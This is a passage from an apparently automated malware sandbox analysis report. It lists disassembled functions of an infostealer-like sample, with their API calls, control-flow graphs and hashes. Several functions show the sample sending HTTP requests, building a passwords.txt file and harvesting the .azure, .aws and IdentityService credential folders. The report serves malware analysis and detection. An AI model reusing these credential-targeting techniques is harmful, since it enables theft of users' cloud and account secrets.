                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00346116
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0034611F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                      • String ID: "$------$build_id$f5$f5$mode
                                                                                                                                                                                      • API String ID: 487080699-4225693864
                                                                                                                                                                                      • Opcode ID: 8c0c3466e8cf1e08459cba101deef26fccc6b148523bd21e3c2ea608d5bb61f2
                                                                                                                                                                                      • Instruction ID: 77137727356b2f29b0b5274836a8b51764458c3c7a27c330efbca5be2e73b41f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c0c3466e8cf1e08459cba101deef26fccc6b148523bd21e3c2ea608d5bb61f2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 39127772800009ABDB06EBE4DC96DEEB7BCBF25304F454165F512BA0A1EF346B49CB94
                                                                                                                                                                                      Function 0034B5E5 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 264stringmemoryfileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034B6A1
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0034B6F8
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0034B6FF
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0034B794
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B7AC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B7BE
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003614B0), ref: 0034B7CC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B7DE
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003614AC), ref: 0034B7EC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B7FB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B80D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B817
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B826
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B838
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B842
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B851
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B863
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B86D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B877
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0034B8A3
                                                                                                                                                                                      • memset.MSVCRT ref: 0034B8E9
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0034B916
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                      • String ID: f5$passwords.txt
                                                                                                                                                                                      • API String ID: 1973479514-1123254558
                                                                                                                                                                                      • Opcode ID: ee898684aeea5387038cabc62d8f79f7bc40083738afb4a30bf6bf4a45499b11
                                                                                                                                                                                      • Instruction ID: b0edf718066643de52becd1df616e550e2e1a8feedf43e4027dfcc00a79c4e79
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee898684aeea5387038cabc62d8f79f7bc40083738afb4a30bf6bf4a45499b11
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DA11472804108ABDF06FBE0ED4ACEE7BB9FF14315F5040A5F506AA0A1EF31AA55DB50
                                                                                                                                                                                      Function 00346E1B Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 425stringmemoryfileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 2659 346e1b-346e39 call 34e741 2662 346e40-346e53 call 34e741 2659->2662 2663 346e3b-346e3e 2659->2663 2664 346e55-346e5b call 34e5f1 2662->2664 2668 346e5d-346e6a call 34e741 2662->2668 2663->2664 2670 346e70-346ef5 call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 2664->2670 2668->2670 2675 347347-34736b call 34e5e8 * 3 call 341301 2668->2675 2706 346f0d-346f29 call 34e766 * 2 CopyFileA 2670->2706 2711 346ef7-346f0a call 34e5b4 call 34fb69 2706->2711 2712 346f2b-346fa4 call 34e57d call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 2706->2712 2711->2706 2737 346fa6-346fbe call 34e6d4 call 34e63b 2712->2737 2738 346fc0-34700e call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e6d4 call 34e63b call 34e5e8 2712->2738 2748 347011-34702d call 34e5e8 call 34e766 call 61ead2ac 2737->2748 2738->2748 2760 347033-34704e call 61e84e02 2748->2760 2761 347318-34732a call 34e766 DeleteFileA call 34e72d 2748->2761 2768 347304-34730d 2760->2768 2769 347054-34706a GetProcessHeap RtlAllocateHeap 2760->2769 2771 34732f-347342 call 34e72d call 34e5e8 * 2 2761->2771 2866 347310 call 61e55691 2768->2866 2867 347310 call 61e55699 2768->2867 2863 34706d call 61e74dc5 2769->2863 2864 34706d call 61e748dc 2769->2864 2865 34706d call 61e7485a 2769->2865 2771->2675 2773 347073-347077 2775 3472a7-3472b3 lstrlenA 2773->2775 2776 34707d-347082 2773->2776 2780 3472f5-347301 memset 2775->2780 2781 3472b5-3472e2 lstrlenA call 34e5b4 call 341324 call 3526f8 2775->2781 2779 347087-347118 call 34e57d * 6 call 34e741 2776->2779 2778 347316-347317 2778->2761 2812 347122 2779->2812 2813 34711a-347120 2779->2813 2780->2768 2794 3472e7-3472f0 call 34e5e8 2781->2794 2794->2780 2814 347128-34713b call 34e5f1 call 34e741 2812->2814 2813->2814 2819 347145 2814->2819 2820 34713d-347143 2814->2820 2821 34714b-34715c call 34e5f1 call 34e75a 2819->2821 2820->2821 2826 347167-3472a1 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 346bb0 call 34e766 lstrcatA call 34e5e8 lstrcatA call 34e5e8 * 6 2821->2826 2827 34715e-347162 call 34e5f1 2821->2827 2826->2775 2826->2779 2827->2826 2863->2773 2864->2773 2865->2773 2866->2778 2867->2778
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E741: StrCmpCA.SHLWAPI(?,?,?,00348A9A,00361404,00000000), ref: 0034E74A
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00346F21
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034FB69: memset.MSVCRT ref: 0034FB86
                                                                                                                                                                                        • Part of subcall function 0034FB69: OpenProcess.KERNEL32(00001001,00000000,?,0035E264,0035E266), ref: 0034FC0D
                                                                                                                                                                                        • Part of subcall function 0034FB69: TerminateProcess.KERNEL32(00000000,00000000), ref: 0034FC1B
                                                                                                                                                                                        • Part of subcall function 0034FB69: CloseHandle.KERNEL32(00000000), ref: 0034FC22
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0034705A
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00347061
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,00000000,00361404,00361404,00000000), ref: 00347173
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 0034717D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034718F
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 00347199
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471AB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 003471B5
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471C7
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 003471D1
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471E3
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 003471ED
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471FF
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 00347209
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00347248
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034725E
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 003472AA
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 003472B8
                                                                                                                                                                                      • memset.MSVCRT ref: 003472FC
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00347321
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyDeleteHandleOpenTerminate
                                                                                                                                                                                      • String ID: d5$f5
                                                                                                                                                                                      • API String ID: 1765998009-2694806845
                                                                                                                                                                                      • Opcode ID: 1dca8311178bb5cf436ef5d10040566c09fc8ed0fb44d4c238ed890e38466794
                                                                                                                                                                                      • Instruction ID: c59cf1997931f541086e61b017ddc527e52a24560e40f3d219f2215047ac11a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dca8311178bb5cf436ef5d10040566c09fc8ed0fb44d4c238ed890e38466794
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE10671804109ABDF06FBE0ED9ACEE7BB9FF11315F504165F406AA0A1EF31AA46DB50
                                                                                                                                                                                      Function 00341134 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 124memoryfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00341154
                                                                                                                                                                                      • wsprintfW.USER32 ref: 0034117A
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 003411AA
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 003411BF
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003411C6
                                                                                                                                                                                      • _time64.MSVCRT ref: 003411CF
                                                                                                                                                                                      • srand.MSVCRT ref: 003411D5
                                                                                                                                                                                      • rand.MSVCRT ref: 003411DA
                                                                                                                                                                                      • memset.MSVCRT ref: 003411EA
                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 003411FC
                                                                                                                                                                                      • memset.MSVCRT ref: 00341216
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00341221
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0034123D
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00341253
                                                                                                                                                                                      • memset.MSVCRT ref: 00341265
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0034126F
                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00341276
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0034127F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileHeap$memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                      • String ID: %s%s$delays.tmp
                                                                                                                                                                                      • API String ID: 4147405854-1413376734
                                                                                                                                                                                      • Opcode ID: 5b619303d129861195d384b8a309c2b1afb4722451f50874f9ce03d94100eb1c
                                                                                                                                                                                      • Instruction ID: 0614448b341e8b0d01a09dc38ca519d7fda5251aca4d45575c2c3e8ee2954702
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b619303d129861195d384b8a309c2b1afb4722451f50874f9ce03d94100eb1c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1231B6B1900604BBDB26ABA6DC4DEEF3B7CEF85751F000965F515E60A0DAB09A84CE71
                                                                                                                                                                                      Function 00354423 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 125stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 0035443E
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00354460
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 0035447A
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354005
                                                                                                                                                                                        • Part of subcall function 00353FEA: FindFirstFileA.KERNEL32(?,?), ref: 0035401C
                                                                                                                                                                                        • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E258), ref: 00354049
                                                                                                                                                                                        • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E254), ref: 00354063
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354083
                                                                                                                                                                                        • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E266), ref: 00354090
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540AD
                                                                                                                                                                                        • Part of subcall function 00353FEA: PathMatchSpecA.SHLWAPI(?,?), ref: 003540D0
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?,000003E8), ref: 003540FC
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 0035410A
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035411A
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 00354128
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035413C
                                                                                                                                                                                      • memset.MSVCRT ref: 003544B5
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003544DC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 003544F6
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540BD
                                                                                                                                                                                        • Part of subcall function 00353FEA: CopyFileA.KERNEL32(?,00000000,00000001), ref: 003541D4
                                                                                                                                                                                        • Part of subcall function 00353FEA: DeleteFileA.KERNEL32(00000000), ref: 00354241
                                                                                                                                                                                        • Part of subcall function 00353FEA: FindNextFileA.KERNEL32(?,?), ref: 0035428B
                                                                                                                                                                                      • memset.MSVCRT ref: 00354527
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0035454E
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00354568
                                                                                                                                                                                        • Part of subcall function 00353FEA: FindClose.KERNEL32(?), ref: 0035429C
                                                                                                                                                                                      • memset.MSVCRT ref: 0035459D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$Filememsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
